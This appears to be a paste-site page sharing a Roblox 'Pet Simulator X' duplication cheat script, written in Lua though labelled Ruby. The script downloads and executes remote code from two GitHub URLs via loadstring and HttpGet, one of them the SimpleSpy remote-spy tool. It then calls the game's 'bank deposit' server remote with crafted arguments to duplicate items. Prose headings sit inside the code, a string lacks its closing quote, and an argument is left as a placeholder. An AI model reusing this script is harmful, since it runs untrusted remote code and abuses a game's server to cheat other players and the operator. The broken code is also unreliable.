Facebook
From Me, 1 Year ago, written in Ruby.
This paste is a reply to Re: Pet Simulator X Dupe Script from Queen Gibbon - view diff
Embed
Download Paste or View Raw
Hits: 615
  1. loadstring(game:HttpGet("https://raw.githubusercontent.com/fikury/dupescripts/main/PetSimulatorX"))()
  2.  --BROUGHT TO YOU BY rbxscript.com!-
  3.  
  4.  
  5. Recognizing our BankID
  6. local lib = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
  7.  
  8. local mybanks = lib.Network.Invoke("get my banks")
  9. local BankID = mybanks[1]['BUID']
  10. setclipboard(BankID)
  11. Script for finding pet IDs
  12. loadstring(game:HttpGet("https://github.com/exxtremestuffs/SimpleSpySource/raw/master/SimpleSpy.lua))()
  13. The dup script itself
  14. local args = {
  15.    [1] = {
  16.        [1] = "here_bankid",
  17.        [2] = {},
  18.        [3] = number of hemes
  19.    }
  20. }
  21. workspace.THINGS.REMOTES:FindFirstChild("bank deposit"):InvokeServer(unpack(args))
  22. --Tutorial : https://youtu.be/q2kLiSdZ5Bg

Replies to Dupee: Re: Pet Simulator X Dupe Script rss

Title Name Language When
Re: Dupee: Re: Pet Simulator X Dupe Script Jittery Gibbon ruby 1 Year ago.
Re: Dupee: Re: Pet Simulator X Dupe Script ME ruby 1 Year ago.
captcha